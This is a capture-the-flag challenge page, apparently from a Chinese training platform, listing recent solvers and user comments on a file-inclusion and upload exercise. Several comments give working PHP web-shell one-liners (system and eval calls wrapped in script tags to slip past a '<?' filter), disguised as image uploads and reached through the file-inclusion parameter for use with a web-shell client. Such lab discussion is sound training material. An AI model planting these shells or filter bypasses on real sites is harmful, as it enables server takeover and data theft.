评分(5)
解题动态
2046185809 攻破了该题 2天前
N3verL4nd 攻破了该题 3天前
sun_space 攻破了该题 3天前
zmzm 攻破了该题 4天前
unigui 攻破了该题 4天前
zlinxx 攻破了该题 4天前
a5580990 攻破了该题 4天前
ldy127bugku 攻破了该题 5天前
zzz666 攻破了该题 5天前
Sadoshi 攻破了该题 6天前
f13yf 攻破了该题 6天前
cyberneko 攻破了该题 7天前
shingu 攻破了该题 8天前
1031368023 攻破了该题 8天前
qiaoooo 攻破了该题 8天前
18846771521 攻破了该题 9天前
smtall 攻破了该题 9天前
3028545694 攻破了该题 9天前
xiaoli98 攻破了该题 10天前
评论
15338641414 2年前
举报
http://114.67.175.224:15047/index.php?file=/flag,写一句话木马,<script language=php>system("ls /")</script> 查看根目录下的文件,发现flag文件,令file=/flag,即可获得flag
落叶满阶红 2年前
举报
注意一是屏蔽了<?,需要用<script language=php>写马,二是蚁剑不要直接连接图片,,记得加?file=
HuangYanQwQ 2年前
举报
直接把hello.php改成 /flag 就秒出了
夜雨 3年前
举报
文件上传+图片一句马 题解:https://www.yeyusmile.top/archives/fileinclude2
你能刑 3年前
举报
包含/flag就行
树木有点绿 3年前
举报
无脑/flag直接获得flag哈哈哈
青蛙骑士 3年前
举报
别卷了阿财
liln0te 3年前
举报
看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以
lysr 3年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
lysr 3年前
举报
桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功
109张某 1年前
举报
大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型
admin138798 3年前
举报
将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了